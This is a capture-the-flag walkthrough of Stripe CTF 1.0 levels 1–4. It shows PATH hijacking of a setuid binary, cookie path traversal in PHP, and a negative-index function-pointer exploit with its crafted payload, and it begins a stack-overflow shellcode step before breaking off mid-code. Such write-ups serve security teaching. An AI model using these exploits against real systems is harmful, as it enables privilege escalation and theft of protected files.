jsanders/stripe-ctf-1.0.md

    Stripe CTF 1.0

Level 1

Ok, start by ssh-ing to level01@ec2-23-22-123-94.compute-1.amazonaws.com with
password w5kjAsSKEjCT. Our goal is to read the file .password from the level02
user's home directory: /home/level02. Let's look for low-hanging fruit - maybe we
can just read the file directly:
$ ls -l /home/level02/.password
-r-------- 1 level02 root 13 2013-09-06 05:04 /home/level02/.password
$ cat /home/level02/.password
cat: /home/level02/.password: Permission denied
Ok, well it was worth a try. Let's look at our hint: "You may find the binary
/levels/level01 and its source code /levels/level01.c useful." Good, let's
check that stuff out:
$ ls -l /levels/level01 /levels/level01.c
-r-Sr-x--- 1 level02 level01 8617 2012-03-14 09:06 /levels/level01
-r--r----- 1 level01 level01  152 2012-03-14 09:06 /levels/level01.c
Ok cool, so we found out that we have permission to execute the binary and read
the source file. There is also that curious S in the owner's execute slot, which
is the setuid bit (it shows as a capital S because the owner itself has no
execute permission). This is our first great clue at how to approach this level -
it means the level01 program will always run with the permissions of the level02
user, instead of those of the user running it.
Let's start by simply running the binary:
$ /levels/level01
Current time: Fri Sep  6 04:25:06 UTC 2013
Ok, seems pretty innocuous. Let's check out the source:
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
  printf("Current time: ");
  fflush(stdout);
  system("date");
  return 0;
}
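Bingo - that system("date") call runs date through the shell, and the resulting
process inherits permissions from our binary, which we already know has access to
the level02 user's password. Since date is given without a path, the shell finds
it by searching PATH, so all we need to do is supply a date program of our own: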
#!/bin/sh
cat /home/level02/.password
...And make it executable, so that it works with the system call:
$ chmod a+x date
Now, as long as we make sure the level01 binary finds our version of date
instead of the one from the system, we'll get the password:
$ PATH=.:$PATH /levels/level01
Current time: PpIFwe32ODvy
Voila!
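The PATH lookup that makes this trick work can be sketched in Python. This is only an illustration under assumptions: it uses a throwaway temporary directory and a harmless stand-in script, and the helper names resolve_command and make_fake_command are made up for this example. It mimics how a shell picks the first matching executable along PATH, nothing more.

```python
import os
import shutil
import stat
import tempfile


def resolve_command(name, extra_dir):
    """Return the path a PATH search finds for `name` when `extra_dir`
    is placed in front of the existing PATH (like PATH=.:$PATH)."""
    search_path = extra_dir + os.pathsep + os.environ.get("PATH", "")
    return shutil.which(name, path=search_path)


def make_fake_command(directory, name):
    """Create a harmless executable stand-in script called `name`."""
    path = os.path.join(directory, name)
    with open(path, "w") as handle:
        handle.write("#!/bin/sh\necho 'not the real date'\n")
    # Mirror `chmod a+x`: add execute permission for everyone.
    mode = os.stat(path).st_mode
    os.chmod(path, mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    return path


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as workdir:
        fake = make_fake_command(workdir, "date")
        # The stand-in wins because its directory is searched first.
        print(resolve_command("date", workdir) == fake)
```

The first directory in the search path that contains an executable with the right name wins, which is why prepending "." is enough here.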
Level 2

Alright, now we log in as the level02 user with the password "PpIFwe32ODvy".
Apparently this is a web-based vulnerability, and we're directed to point our
browser at the /level02.php path on the server. I don't have port 80 open to
the server, so we'll just have to use curl locally:
$ curl http://0.0.0.0/level02.php
We get back some very friendly HTML:
<html>
  <head>
    <title>Level02</title>
  </head>
  <body>
    <h1>Welcome to the challenge!</h1>
    <div class="main">
      <p><p>Looks like a first time user. Hello, there!</p></p>
            <form action="#" method="post">
        Name: <input name="name" type="text" length="40" /><br />
        Age: <input name="age" type="text" length="2" /><br /><br />
        <input type="submit" value="Submit!" />
      </form>
          </div>
  </body>
</html>
Ok, let's try POSTing to the nice form:
$ curl -d "name=James&age=27" http://0.0.0.0/level02.php
Now we don't have the form, and it knows some information about us, but it
still thinks we're a first time user:
<html>
  <head>
    <title>Level02</title>
  </head>
  <body>
    <h1>Welcome to the challenge!</h1>
    <div class="main">
      <p><p>Looks like a first time user. Hello, there!</p></p>
      You're James, and your age is 27    </div>
  </body>
</html>
Even without looking at the source, we can guess that there is some sort of
statefulness going on in this application, and in HTTP, statefulness means
cookies. Let's see what the headers say:
$ curl -v -d "name=James&age=27" http://0.0.0.0/level02.php
...
< HTTP/1.1 200 OK
< Date: Fri, 06 Sep 2013 06:05:21 GMT
< Server: Apache/2.2.14 (Ubuntu)
< X-Powered-By: PHP/5.3.2-1ubuntu4.14
< Set-Cookie: user_details=acjpu4h45pxcqoz.txt
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/html
...

Neat, we have a Set-Cookie in there, let's try just sending that right back:
$ curl -v -d "name=James&age=27" -H "Cookie: user_details=acjpu4h45pxcqoz.txt" http://0.0.0.0/level02.php
...
> POST /level02.php HTTP/1.1
> User-Agent: curl/7.19.7 (x86_64-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k zlib/1.2.3.3 libidn/1.15
> Host: 0.0.0.0
> Accept: */*
> Cookie: user_details=acjpu4h45pxcqoz.txt
> Content-Length: 17
> Content-Type: application/x-www-form-urlencoded
>
< HTTP/1.1 200 OK
< Date: Fri, 06 Sep 2013 06:09:42 GMT
< Server: Apache/2.2.14 (Ubuntu)
< X-Powered-By: PHP/5.3.2-1ubuntu4.14
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/html
<

<html>
  <head>
    <title>Level02</title>
  </head>
  <body>
    <h1>Welcome to the challenge!</h1>
    <div class="main">
      <p>127.0.0.1 using curl/7.19.7 (x86_64-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k zlib/1.2.3.3 libidn/1.15</p>
      You're James, and your age is 27    </div>
  </body>
</html>
...
Lookie there, it no longer thinks we're a new user! It even knows our IP and
user agent. Sort of spooky. Let's see what happens when we go back to our
original GET, but keep our cookie:
$ curl -v -H "Cookie: user_details=acjpu4h45pxcqoz.txt" http://0.0.0.0/level02.php
<html>
  <head>
    <title>Level02</title>
  </head>
  <body>
    <h1>Welcome to the challenge!</h1>
    <div class="main">
      <p>127.0.0.1 using curl/7.19.7 (x86_64-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k zlib/1.2.3.3 libidn/1.15</p>
            <form action="#" method="post">
        Name: <input name="name" type="text" length="40" /><br />
        Age: <input name="age" type="text" length="2" /><br /><br />
        <input type="submit" value="Submit!" />
      </form>
          </div>
  </body>
</html>
We get the form back, but now it knows our info. Ok, so now we actually have a
clue, before even looking at the source. The cookie has the form user_details=<blah>.txt.
I'm guessing <blah>.txt is a real file being written, and I just bet it's
owned by the level03 user, which means we might be able to use HTTP requests
with crafted cookie headers to read arbitrary files owned by the level03 user.
Ok, let's finally look at the source. It's in /var/www/level02.php. Here are
the interesting parts:
$out = '';
if (!isset($_COOKIE['user_details'])) {
  # Creates a random temp file and sets $out to be a placeholder
}
else {
  $out = file_get_contents('/tmp/level02/'.$_COOKIE['user_details']);
}

# ...

   <h1>Welcome to the challenge!</h1>
    <div class="main">
      <p><?php echo $out ?></p>

# ...
The else block and the echo $out together allow us to grab arbitrary file
contents through a simple request. We just need to set our user_details cookie
to point to a relative path from /tmp/level02/ to /home/level03/.password:
$ curl -H "Cookie: user_details=../../home/level03/.password" http://0.0.0.0/level02.php
<html>
  <head>
    <title>Level02</title>
  </head>
  <body>
    <h1>Welcome to the challenge!</h1>
    <div class="main">
      <p>RRLQAx7iwvvH
</p>
            <form action="#" method="post">
        Name: <input name="name" type="text" length="40" /><br />
        Age: <input name="age" type="text" length="2" /><br /><br />
        <input type="submit" value="Submit!" />
      </form>
          </div>
  </body>
</html>
BOOM.
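To see why that cookie value lands on the password file, here is a small Python sketch of the path arithmetic. It assumes the PHP code simply concatenates '/tmp/level02/' with the cookie (as the source excerpt shows) and ignores symlinks; resolve_cookie_path and stays_inside are hypothetical helper names, and stays_inside is just one possible check, not something the level's code does.

```python
import posixpath

BASE_DIR = "/tmp/level02/"


def resolve_cookie_path(cookie_value, base_dir=BASE_DIR):
    """Concatenate like the PHP source does, then collapse any '..'
    components to show which file would actually be read."""
    return posixpath.normpath(base_dir + cookie_value)


def stays_inside(cookie_value, base_dir=BASE_DIR):
    """Hypothetical check: True only if the resolved path is still
    located under base_dir."""
    base = posixpath.normpath(base_dir)
    resolved = resolve_cookie_path(cookie_value, base_dir)
    return posixpath.commonpath([base, resolved]) == base


if __name__ == "__main__":
    print(resolve_cookie_path("../../home/level03/.password"))
    print(stays_inside("../../home/level03/.password"))
    print(stays_inside("acjpu4h45pxcqoz.txt"))
```

Each "../" climbs one directory, so two of them take us from /tmp/level02/ up to the filesystem root before descending into /home/level03.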
Level 3

Woot, let's log in as the level03 user with the password "RRLQAx7iwvvH". Same
drill, but this time with a binary /levels/level03 and matching source file
/levels/level03.c. Let's go straight to running it:
$ /levels/level03
Usage: ./level03 INDEX STRING
Possible indices:
[0] to_upper  [1] to_lower
[2] capitalize	[3] length
$ /levels/level03 0 abcd
Uppercased string: ABCD
$ /levels/level03 1 abcd
Lowercased string: abcd
$ /levels/level03 2 abcd
Capitalized string: Abcd
$ /levels/level03 3 abcd
Length of string 'abcd': 4
$ /levels/level03 4 abcd
Invalid index.
Possible indices:
[0] to_upper	[1] to_lower
[2] capitalize	[3] length
Ok, pretty straightforward - error handling seems reasonably good. Nothing at
all obvious here. Let's hit the code. There are a few interesting sections. First,
it just defines how many functions there are, a function type for them, and the
functions themselves:
#define NUM_FNS 4

typedef int (*fn_ptr)(const char *);

int to_upper(const char *str) { /* ... */ }
int to_lower(const char *str) { /* ... */ }
int capitalize(const char *str) { /* ... */ }
int length(const char *str) { /* ... */ }
Then, there's the curious case of a deprecated function:
int run(const char *str)
{
  // This function is now deprecated.
  return system(str);
}
We'll pretty obviously want to be figuring out how to call that, but it isn't
called directly anywhere in the file. Then, the relatively simple, but juicy,
function that dynamically calls the proper function:
int truncate_and_call(fn_ptr *fns, int index, char *user_string)
{
  char buf[64];
  // Truncate supplied string
  strncpy(buf, user_string, sizeof(buf) - 1);
  buf[sizeof(buf) - 1] = '\0';
  return fns[index](buf);
}
The array of fn_ptrs is actually passed in from main, where it is defined with
a fixed initializer:
fn_ptr fns[NUM_FNS] = {&to_upper, &to_lower, &capitalize, &length};
Finally, the guard for the index is interesting:
index = atoi(argv[1]);

if (index >= NUM_FNS) { /* ... */ }
Pulling a few strands together, it looks like we need a way to make fns[index]
give us a reference to run, which we can then provide a string to, such as
"cat /home/level04/.password" and have run under the level04 user's permissions.
Let's therefore look very closely at this single line fragment: fns[index](buf).
Of the three parts of that fragment, fns, index, and buf, one is the structure
we'd like to muck with and the other two are user provided. Let's take them case by
case:

buf - Can we overflow our buffer? The use of strncpy seems to make this a
dead end.
fns - Can we inject the address of the run function into this structure
somehow? It seems like no, because it is statically defined to point
to those exact four functions.
index - Can we muck with index in a way that is clearly not intended?
Actually, yes! Note that atoi returns a signed int, but the guard only
rejects index values of 4 (NUM_FNS) or more. We can pass in negative
values!
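The hole in the guard is easy to model. The sketch below is Python rather than C, so it only mirrors the comparison itself; stricter_guard_rejects is a hypothetical fix that is not in the level's source.

```python
NUM_FNS = 4  # same value as the #define in level03.c


def guard_rejects(index):
    """Mirror the source's check: only `index >= NUM_FNS` is refused."""
    return index >= NUM_FNS


def stricter_guard_rejects(index):
    """Hypothetical fix: also refuse negative indices."""
    return index < 0 or index >= NUM_FNS


if __name__ == "__main__":
    for candidate in (0, 3, 4, -1, -28):
        print(candidate, guard_rejects(candidate), stricter_guard_rejects(candidate))
```

Every negative number sails through the original comparison, which is all the opening we need.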

So now we know our goal - we want to pass a negative value for index that will
cause the run function to be called with a command that prints us the desired
password. What fns[index] really does is *(fns + index), where the pointer
arithmetic is scaled by the size of one element - here a 4-byte function
pointer. If fns points to 0x10, then fns + 1 points to 0x14 and fns - 1 points
to 0x0c. What we need is to find an offset from fns
that is a memory address pointing to a chunk of 4 bytes that represent the memory
location of the run function. The address of the run function is unlikely to
live in memory anywhere, so we'll have to put it there ourselves. Which means
we'll first need to know where it is. There are a few ways (that I know of) to
do this:
With GDB:
$ gdb -d /levels /levels/level03
# ...
(gdb) print run
$1 = {int (const char *)} 0x804875b <run>
With objdump:
$ objdump -t /levels/level03 | grep "run$"
0804875b g     F .text	00000013              run
With nm:
$ nm /levels/level03 | grep run$
0804875b T run
I prefer to use gdb, because it's useful for other stuff anyway, as we'll see
in a moment. In any case, that sucker lives at 0x804875b. That's all fine and
good, but how do we get that value into memory somewhere? Well, there's only
one thing that we (almost) fully control, and that is the memory chunk that
ends up in buf. Conveniently, that happens to be sitting on the stack just a
few short bytes up (negative!) from where fns points. Here's where gdb comes
in again, let's figure out exactly how many bytes up:
$ gdb -d /levels /levels/level03
# ...
(gdb) list
59	  // Truncate supplied string
60	  strncpy(buf, user_string, sizeof(buf) - 1);
61	  buf[sizeof(buf) - 1] = '\0';
62	  return fns[index](buf);
63	}
64
65	int main(int argc, char **argv)
66	{
67	  int index;
68	  fn_ptr fns[NUM_FNS] = {&to_upper, &to_lower, &capitalize, &length};
(gdb) break 62
Breakpoint 1 at 0x80487a9: file level03.c, line 62.
(gdb) run 0 abcd
# ...
Breakpoint 1, truncate_and_call (fns=0xff96457c, index=0,
    user_string=0xff96492c "abcd") at level03.c:62
62	  return fns[index](buf);
(gdb) print fns
$1 = (fn_ptr *) 0xff96457c
(gdb) print &buf
$3 = (char (*)[64]) 0xff96450c
(gdb) print (0xff96457c - 0xff96450c) / 4
$8 = 28
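The same pointer arithmetic can be written out as a quick Python sketch. The addresses are the ones gdb printed above; element_address and index_reaching are names invented for this illustration, and the 4-byte element size is an assumption that holds for this 32-bit binary.

```python
ELEMENT_SIZE = 4  # size of one fn_ptr on this 32-bit target


def element_address(base, index, element_size=ELEMENT_SIZE):
    """Address read by base[index] in C: base + index * element_size."""
    return (base + index * element_size) & 0xFFFFFFFF


def index_reaching(base, target, element_size=ELEMENT_SIZE):
    """Index i such that base[i] lives at `target` (must be aligned)."""
    delta = target - base
    if delta % element_size != 0:
        raise ValueError("target is not aligned to an element boundary")
    return delta // element_size


if __name__ == "__main__":
    fns = 0xFF96457C
    buf = 0xFF96450C
    print(index_reaching(fns, buf))
    print(hex(element_address(fns, index_reaching(fns, buf))))
```

Because buf sits below fns on the stack, the index that reaches it comes out negative.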

Nifty! Now we know that if we input -28 for index, the value of fns[index]
will be an address constructed from the first four bytes of the string that we
input! Let's try that:
(gdb) kill
Kill the program being debugged? (y or n) y
(gdb) run -28 abcd
# ...
Breakpoint 1, truncate_and_call (fns=0xffdcc81c, index=-28,
    user_string=0xffdce92c "abcd") at level03.c:62
62	  return fns[index](buf);
(gdb) print fns[index]
$9 = (fn_ptr) 0x64636261

Wow, sure enough, 0x61 is the hex ascii for the 'a' character, 0x62 is 'b',
0x63 is 'c' and 0x64 is 'd'. They're "backwards" because x86 is a little-endian
architecture: the least significant byte of a 4-byte word is stored at the
lowest address. If we were on a big-endian system, the sequence of bytes
[ 0x61, 0x62, 0x63, 0x64 ] would represent the 4-byte word 0x61626364, but on a
little-endian system it represents 0x64636261. This is not a big deal at all, as
long as you are aware of it. Ok, for our next trick, let's get our run address in
there instead of 0x64636261:
(gdb) run -28 "`echo -e "\x5b\x87\x04\x08"`"
# ...
Breakpoint 1, truncate_and_call (fns=0xfffd9f6c, index=-28,
    user_string=0xfffdb92c "[\207\004\b") at level03.c:62
62	  return fns[index](buf);
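If the byte ordering feels slippery, Python's struct module can do the conversion in both directions. This is just a sanity-check sketch; the helper names are made up, and as_echo_escapes only formats text for pasting into an echo -e command.

```python
import struct


def word_from_bytes(raw):
    """Interpret 4 bytes as a little-endian 32-bit unsigned integer."""
    return struct.unpack("<I", raw)[0]


def bytes_from_word(value):
    """Lay out a 32-bit value in little-endian byte order."""
    return struct.pack("<I", value)


def as_echo_escapes(raw):
    """Format bytes as backslash-x escapes suitable for `echo -e`."""
    return "".join("\\x{:02x}".format(byte) for byte in raw)


if __name__ == "__main__":
    print(hex(word_from_bytes(b"abcd")))
    print(as_echo_escapes(bytes_from_word(0x0804875B)))
```

Packing the address of run this way gives the same four bytes used in the echo command above.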

Note, I called out to echo with the -e option for interpreting escape sequences,
otherwise we would just end up with literal "\", "x", "5", "b", etc. instead of a
single byte representing the value 0x5b, etc. Also note, I listed the bytes in
"backwards" little-endian order. Let's see what this looks like in memory:
(gdb) x/64xb buf
0xfffd9efc:	0x5b	0x87	0x04	0x08	0x00	0x00	0x00	0x00
0xfffd9f04:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xfffd9f0c:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xfffd9f14:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xfffd9f1c:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xfffd9f24:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xfffd9f2c:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xfffd9f34:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00

That syntax just means "examine the first 64 hex-formatted bytes of buf". We
can see our values right there where we want them! Let's see if that translates
into getting what we want out of fns:
(gdb) print fns[index]
$1 = (fn_ptr) 0x804875b <run>

Bullseye. Let's just let the program run:
(gdb) continue
Continuing.
sh: [: not found

Program exited normally.

Ok, what happened here? Well, all we have in buf is four bytes of gobbledegook.
We called system("\x5b\x87\x04\x08"), which makes no sense. What we need to do
is make the first part of buf a real command, followed by the address of run.
Let's try this: "cat /home/level04/.password;#\x5b\x87\x04\x08". We should be
sending two semi-colon-separated commands to system, the second of which is
just a comment (because of the '#' in front of it) and should have no effect:
(gdb) run -28 "`echo -e "cat /home/level04/.password;#\x5b\x87\x04\x08"`"
# ...
Breakpoint 1, truncate_and_call (fns=0xffa0fbec, index=-28,
    user_string=0xffa1090f "cat /home/level04/.password;#[\207\004\b") at level03.c:62
62	  return fns[index](buf);
(gdb) print fns[index]
$2 = (fn_ptr) 0x20746163

Well duh, that's not right, we added a bunch of stuff at the beginning of buf,
so we need to change our index. Let's figure out what the right value is now:
(gdb) x/64xb buf
0xffa0fb7c:	0x63	0x61	0x74	0x20	0x2f	0x68	0x6f	0x6d
0xffa0fb84:	0x65	0x2f	0x6c	0x65	0x76	0x65	0x6c	0x30
0xffa0fb8c:	0x34	0x2f	0x2e	0x70	0x61	0x73	0x73	0x77
0xffa0fb94:	0x6f	0x72	0x64	0x3b	0x23	0x5b	0x87	0x04
0xffa0fb9c:	0x08	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xffa0fba4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xffa0fbac:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xffa0fbb4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00

Hmm, our bytes are there, but they aren't aligned on a word boundary, so we
can't use them yet. We have two options: we could try to remove one character,
or add three. Heck, let's try to remove the '#' - maybe we'll get an error, but
we will have already seen the password and won't care:
(gdb) kill
Kill the program being debugged? (y or n) y
(gdb) run -28 "`echo -e "cat /home/level04/.password;\x5b\x87\x04\x08"`"
# ...
Breakpoint 1, truncate_and_call (fns=0xffacde2c, index=-28,
    user_string=0xfface910 "cat /home/level04/.password;[\207\004\b") at level03.c:62
62	  return fns[index](buf);
(gdb) x/64xb buf
0xffacddbc:	0x63	0x61	0x74	0x20	0x2f	0x68	0x6f	0x6d
0xffacddc4:	0x65	0x2f	0x6c	0x65	0x76	0x65	0x6c	0x30
0xffacddcc:	0x34	0x2f	0x2e	0x70	0x61	0x73	0x73	0x77
0xffacddd4:	0x6f	0x72	0x64	0x3b	0x5b	0x87	0x04	0x08
0xffacdddc:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xffacdde4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xffacddec:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xffacddf4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00

Alright there we are, our bytes are in the second half of the line marked
0xffacddd4, which means they begin at the word boundary 0xffacddd8. Let's figure
out what index we need to get there:
(gdb) print fns
$3 = (fn_ptr *) 0xffacde2c
(gdb) print (0xffacde2c - 0xffacddd8) / 4
$4 = 21
(gdb) print fns[-21]
$5 = (fn_ptr) 0x804875b <run>

Huzzah! Let's put it all together:
(gdb) run -21 "`echo -e "cat /home/level04/.password;\x5b\x87\x04\x08"`"
Breakpoint 1, truncate_and_call (fns=0xffbc988c, index=-21,
    user_string=0xffbca910 "cat /home/level04/.password;[\207\004\b") at level03.c:62
62	  return fns[index](buf);
(gdb) print fns[index]
$6 = (fn_ptr) 0x804875b <run>
(gdb) c
Continuing.
cat: /home/level04/.password: Permission denied
sh: [: not found

Program exited normally.

Ah, yes, we got an error because a setuid program run under gdb doesn't get its
elevated privileges - if it did, this sort of thing would be way too easy! But it
definitely looks like we ran the command we expected, so let's run it outside gdb!
$ /levels/level03 -21 "`echo -e "cat /home/level04/.password;\x5b\x87\x04\x08"`"
0lIhigNwu6RT
sh: [: not found
Look! A password! Whew, the game was certainly taken to a new level on this one.
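The bookkeeping from this level (word alignment plus the index calculation) can be collected into one small Python sketch. It assumes the 0x70-byte distance between buf and fns measured in gdb above and the address of run found earlier. build_argument is a hypothetical helper, and padding with spaces is just one way to reach a word boundary.

```python
import struct

WORD = 4
FNS_MINUS_BUF = 0x70      # fns - &buf as measured in gdb (112 bytes)
RUN_ADDRESS = 0x0804875B  # address of run reported by gdb
MAX_COPIED = 63           # strncpy copies at most sizeof(buf) - 1 bytes


def build_argument(command, target_address=RUN_ADDRESS):
    """Pad `command` with spaces to a word boundary, then append the
    little-endian address. Returns (payload bytes, index to pass)."""
    raw = command.encode("ascii")
    raw += b" " * ((-len(raw)) % WORD)
    payload = raw + struct.pack("<I", target_address)
    if len(payload) > MAX_COPIED:
        raise ValueError("payload would be truncated by strncpy")
    # The address sits len(raw) bytes into buf; count words back from fns.
    index = -((FNS_MINUS_BUF - len(raw)) // WORD)
    return payload, index


if __name__ == "__main__":
    payload, index = build_argument("cat /home/level04/.password;")
    print(index, payload)
```

With the 28-character command no padding is needed. With the trailing '#' the helper adds three spaces, which is the "add three" option mentioned earlier, and the index shifts by one word.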
Level 4

Same drill - log in as level04 with password "0lIhigNwu6RT". We're looking
for a password in /home/level05/.password and we have access to the /levels/level04
binary, which is owned by the level05 user and has setuid set, and its source in
/levels/level04.c. There is also a hint: "The vulnerabilities overfloweth!". Oh
boy. As usual, let's start by running the thing:
$ /levels/level04
Usage: ./level04 STRING
Interestingly, there's also not a newline at the end of the output. That seems
suspicious right off the bat. Let's run with some input:
$ /levels/level04 abcd
Oh no! That didn't work!
$ /levels/level04 help
Oh no! That didn't work!
Ok, this is getting us nowhere. To the code! Alright, this one is short, so here's
the whole thing:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void fun(char *str)
{
  char buf[1024];
  strcpy(buf, str);
}

int main(int argc, char **argv)
{
  if (argc != 2) {
    printf("Usage: ./level04 STRING");
    exit(-1);
  }
  fun(argv[1]);
  printf("Oh no! That didn't work!\n");
  return 0;
}
Between the hint, and the use of strcpy instead of strncpy for user data, we
can quickly ascertain that we're going for a buffer overflow here. Whatever we
send for the STRING argument to the program past 1024 bytes will begin overwriting
memory that we shouldn't have access to. What to do with that overflow seems to be
the tough part. We don't have any built-in run function as in the last level,
and we need something just like it, which suggests to me that we want to write
our own version in a format that is suitable for injecting through program input.
I think the easiest way to do this is actually to go look at what the compiled
version of the run function from the previous level looks like:
(gdb) print run
$1 = {int (const char *)} 0x804875b <run>
(gdb) set disassembly-flavor intel
(gdb) disassemble run
Dump of assembler code for function run:
   0x0804875b <+0>:	push   ebp
   0x0804875c <+1>:	mov    ebp,esp
   0x0804875e <+3>:	sub    esp,0x18
   0x08048761 <+6>:	mov    eax,DWORD PTR [ebp+0x8]
   0x08048764 <+9>:	mov    DWORD PTR [esp],eax
   0x08048767 <+12>:	call   0x804847c <system@plt>
   0x0804876c <+17>:	leave
   0x0804876d <+18>:	ret
End of assembler dump.

Alright, so we know it starts at 0x0804875b and does a few things, most notably
the call to 0x0804847c, which appears to be the entry point (a PLT stub) for the
system function from the C library, and ends at 0x0804876d. The rest of the
function is not too clear to me, but it is probably related to the function
calling convention - we know we pass a const char * to the run function, which at
the assembly level is just going to mean we put a single 32-bit value somewhere
that the procedure knows to find it.
Let's log back in as the level03 user and step through the actual instructions
that call run to see what's going on:
$ gdb -d /levels /levels/level03
# ...
(gdb) break 62
Breakpoint 1 at 0x80487a9: file level03.c, line 62.
(gdb) run -21 "`echo -e "cat /home/level04/.password;\x5b\x87\x04\x08"`"
# ...
Breakpoint 1, truncate_and_call (fns=0xffc3242c, index=-21,
    user_string=0xffc32910 "cat /home/level04/.password;[\207\004\b") at level03.c:62
62	  return fns[index](buf);
(gdb) set disassembly-flavor intel
(gdb) disassemble
Dump of assembler code for function truncate_and_call:
# ... Elided beginning of function up to return from strncpy
=> 0x080487a9 <+59>:	mov    eax,DWORD PTR [ebp+0xc]
   0x080487ac <+62>:	shl    eax,0x2
   0x080487af <+65>:	add    eax,DWORD PTR [ebp-0x5c]
   0x080487b2 <+68>:	mov    edx,DWORD PTR [eax]
   0x080487b4 <+70>:	lea    eax,[ebp-0x4c]
   0x080487b7 <+73>:	mov    DWORD PTR [esp],eax
   0x080487ba <+76>:	call   edx
# ... Elided end of function
End of assembler dump.
(gdb) print fns[index]
$1 = (fn_ptr) 0x804875b <run>
(gdb) print &buf
$3 = (char (*)[64]) 0xffc323bc

So we expect to call the function at 0x0804875b with the argument 0xffc323bc.
We eventually call whatever is in edx, so let's see what that is after the first
few instructions of the sequence:
(gdb) stepi
0x080487ac	62	  return fns[index](buf);
(gdb) stepi
0x080487af	62	  return fns[index](buf);
(gdb) stepi
0x080487b2	62	  return fns[index](buf);
(gdb) stepi
0x080487b4	62	  return fns[index](buf);
(gdb) disassemble
Dump of assembler code for function truncate_and_call:
# ...
   0x080487a9 <+59>:	mov    eax,DWORD PTR [ebp+0xc]
   0x080487ac <+62>:	shl    eax,0x2
   0x080487af <+65>:	add    eax,DWORD PTR [ebp-0x5c]
   0x080487b2 <+68>:	mov    edx,DWORD PTR [eax]
=> 0x080487b4 <+70>:	lea    eax,[ebp-0x4c]
   0x080487b7 <+73>:	mov    DWORD PTR [esp],eax
   0x080487ba <+76>:	call   edx
# ...
End of assembler dump.
(gdb) print/x $edx
$7 = 0x804875b

Sure enough, there's the address of run, as expected. The more interesting part
is what happens with the address of buf:
(gdb) stepi
0x080487b7	62	  return fns[index](buf);
(gdb) stepi
0x080487ba	62	  return fns[index](buf);
(gdb) disassemble
Dump of assembler code for function truncate_and_call:
# ...
   0x080487a9 <+59>:	mov    eax,DWORD PTR [ebp+0xc]
   0x080487ac <+62>:	shl    eax,0x2
   0x080487af <+65>:	add    eax,DWORD PTR [ebp-0x5c]
   0x080487b2 <+68>:	mov    edx,DWORD PTR [eax]
   0x080487b4 <+70>:	lea    eax,[ebp-0x4c]
   0x080487b7 <+73>:	mov    DWORD PTR [esp],eax
=> 0x080487ba <+76>:	call   edx
# ...
End of assembler dump.
(gdb) x/4xb $esp
0xffc32390:	0xbc	0x23	0xc3	0xff
(gdb) x/1xw $esp
0xffc32390:	0xffc323bc

Oh, hello there &buf - it's simply been put on the top of the stack. The
standard C calling convention just pushes arguments on the stack, in reverse
order, but since we only have one argument, it's right on the top. Let's revisit
the run function with this knowledge:
(gdb) stepi
run (str=0xffc323bc "cat /home/level04/.password;[\207\004\b") at level03.c:51
51	{
(gdb) disassemble
Dump of assembler code for function run:
=> 0x0804875b <+0>:	push   ebp
   0x0804875c <+1>:	mov    ebp,esp
   0x0804875e <+3>:	sub    esp,0x18
   0x08048761 <+6>:	mov    eax,DWORD PTR [ebp+0x8]
   0x08048764 <+9>:	mov    DWORD PTR [esp],eax
   0x08048767 <+12>:	call   0x804847c <system@plt>
   0x0804876c <+17>:	leave
   0x0804876d <+18>:	ret
End of assembler dump.
(gdb) stepi
0x0804875c	51	{
(gdb) stepi
0x0804875e	51	{
(gdb) stepi
53	  return system(str);
(gdb) stepi
0x08048764	53	  return system(str);
(gdb) stepi
0x08048767	53	  return system(str);
(gdb) disassemble
Dump of assembler code for function run:
   0x0804875b <+0>:	push   ebp
   0x0804875c <+1>:	mov    ebp,esp
   0x0804875e <+3>:	sub    esp,0x18
   0x08048761 <+6>:	mov    eax,DWORD PTR [ebp+0x8]
   0x08048764 <+9>:	mov    DWORD PTR [esp],eax
=> 0x08048767 <+12>:	call   0x804847c <system@plt>
   0x0804876c <+17>:	leave
   0x0804876d <+18>:	ret
End of assembler dump.
(gdb) x/1xw $esp
0xffc32370:	0xffc323bc

So all we really did was create ourselves a new 24-byte stack frame (I don't
really know why, since we're only using one word of it, but maybe there's a
minimum for some reason), and then store the location of our buffer at the top
of it. What we've learned from all of this is that in order to call the system
function, all we really need to do is push the location of our buffer onto the
stack and call into the absolute location of system in our object. Of course,
we need actual machine code to do these things. Honestly, I think the easiest way
to do this is to just write what we want locally, run it through an assembler,
and pick out the parts we're interested in. Here are the instructions we want,
using the values from the level03 example, which we'll have to change later:
push DWORD 0xffc323bc	; Push our buffer address onto the stack
mov eax, 0x0804847c	; Move `system`s address into a register
call eax		; Call `system`
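We can't just call 0x0804847c directly, because a call with an immediate operand
is encoded as an offset relative to the instruction that follows it - it works to
write that code, but nasm quietly translates our absolute address into a relative
one at assembly time, and that offset would be wrong once our bytes are copied to
a different location. Calling through a register uses the absolute address.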
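To make the relative-address point concrete, here is a Python sketch of how a near call with an immediate gets encoded (opcode 0xE8 followed by a 32-bit displacement measured from the end of the instruction). encode_relative_call is a made-up helper, and the first address pair is taken from the disassembly of run shown earlier.

```python
import struct

CALL_REL32_OPCODE = 0xE8  # x86 near call with a 32-bit relative displacement
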